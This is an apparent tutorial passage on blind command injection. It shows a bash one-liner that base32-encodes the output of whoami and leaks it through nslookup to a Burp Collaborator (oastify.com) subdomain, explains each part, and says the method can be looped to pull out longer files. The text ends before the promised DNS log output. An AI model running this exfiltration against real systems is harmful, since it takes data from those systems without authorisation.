Last updated
Last updated
Here’s our bash command:
a=$(whoami|base32|tr -d =);nslookup
$a.3EjvJTTf7HVHax6woyRfKkmKFxbW1Cv4z6.oastify.com
Let’s break it down: run this command: a=$(whoami|base32|tr –d =) o $(…):
the dollar sign and parentheses allow us to run a command (or series of commands) between the parentheses and store their output in a variable (a, in this case)
Run whoami (output is www-data) o Pipe that to base32 (output is O53XOLLEMF2GCCQ=)
tr –d = (delete any ”=“ signs)
$a now contains O53XOLLEMF2GCCQ
Then run:
nslookup O53XOLLEMF2GCC.3EjvJTTf7HVHax6woyRfKkmKFxbW1Cv4z6.oastify.com
You can use burp collaborator to get this domain and check the queries if you do not have a domain to use.
You can also automate this with a loop to get longer files and info. DNS request names can be a maximum of 63 characters, so this is not an issue for small requests:
Here is what the DNS logs would look like:
